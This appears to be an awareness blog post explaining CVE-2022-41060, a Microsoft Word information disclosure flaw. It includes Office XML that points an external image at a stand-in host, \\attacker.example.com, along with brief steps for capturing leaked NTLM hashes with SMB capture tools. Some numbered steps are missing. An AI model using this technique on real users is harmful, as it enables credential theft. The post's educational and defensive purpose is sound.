CVE-2022-41060 - Understanding the Microsoft Word Information Disclosure Vulnerability
Microsoft Word is widely used for everyday tasks, from writing homework to sharing contracts in huge businesses. But with popularity comes attention from hackers. In late 2022, Microsoft published details of a security hole: CVE-2022-41060. This post will break down what this CVE is, why it matters, and how attackers could have taken advantage of it. Let’s make sure you know what happened, what to look for, and how to stay safe!
What is CVE-2022-41060?
CVE-2022-41060 is an information disclosure vulnerability in Microsoft Word. That means, under certain conditions, attackers can trick Word into revealing information that should stay private. This issue is related to—but importantly, not the same as—CVE-2022-41103. Microsoft listed the risk as "Important" in its security updates.
How Does the Vulnerability Work?
Attackers can craft a malicious Word file (.docx, .doc, .rtf, etc.) and convince a user to open and view it. By exploiting how Word handles certain document features—especially embedded objects or external links—an attacker can cause Word to leak sensitive information. This can include parts of the user's files, usernames, or even authentication tokens.
When opened, Word automatically tries to fetch or display the embedded data.
4. Sensitive information (like the user's NTLM hash) is sent to a server controlled by the attacker.
Below is a simplified example of how attackers might structure such a Word document
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">;
<w:body>
<w:p>
<w:r>
<w:object>
<v:shape id="Picture" style="width:100pt;height:100pt">
<v:imagedata r:id="rIdImage1" o:title=""/>
</v:shape>
</w:object>
</w:r>
</w:p>
</w:body>
</w:document>
And in the document’s relationships (word/_rels/document.xml.rels)
<Relationship Id="rIdImage1"
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image";
Target="\\attacker.example.com\share\image.png"
TargetMode="External"/>
Explanation:
This tells Word to fetch an image from \\attacker.example.com\share\image.png. When Word tries to get this image, it sends your Windows credentials (in the form of an NTLM hash) to the attacker’s server. The attacker can try to crack this hash or use it for network attacks.
Why is This Dangerous?
Information disclosure in products like Word can, in many cases, seem "minor" at first. But leaking NTLM hashes or sensitive paths can help an attacker move further inside a network, impersonate users, or launch future attacks. It's a soft entrypoint for bigger threats like ransomware or espionage.
Set up a basic network share or SMB server to catch NTLM hashes
Tools like impacket’s smbserver.py or Responder are useful.
Use the relationship code above, pointing to your server.
3. Send/open the file on a Windows system with Word installed
When Word tries to load the object, it will initiate an SMB connection to the attacker’s server, sending authentication data.
Mitigation and Patches
Microsoft released patches for CVE-2022-41060 as part of their November 2022 Patch Tuesday. Check that your Office installation is up to date!
- Update Word/Office automatically.
References & Further Reading
- Microsoft Security Update Guide - CVE-2022-41060
- Microsoft Security Blog
- NTLM Hash Attacks with Word Documents
- How Office Documents Leak Credentials
Final Thoughts
CVE-2022-41060 is a great lesson in just how much power a simple document format can have. Always update your software and be cautious when opening unexpected files. If you're managing corporate systems, educate users and filter potentially dangerous attachments at the gateway.
Stay safe and always update!
*This article is exclusive to your request, using public knowledge and focusing on education and awareness. If you have more questions about CVEs or Office security, let us know.*
Timeline
Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/10/2022 00:33:00 UTC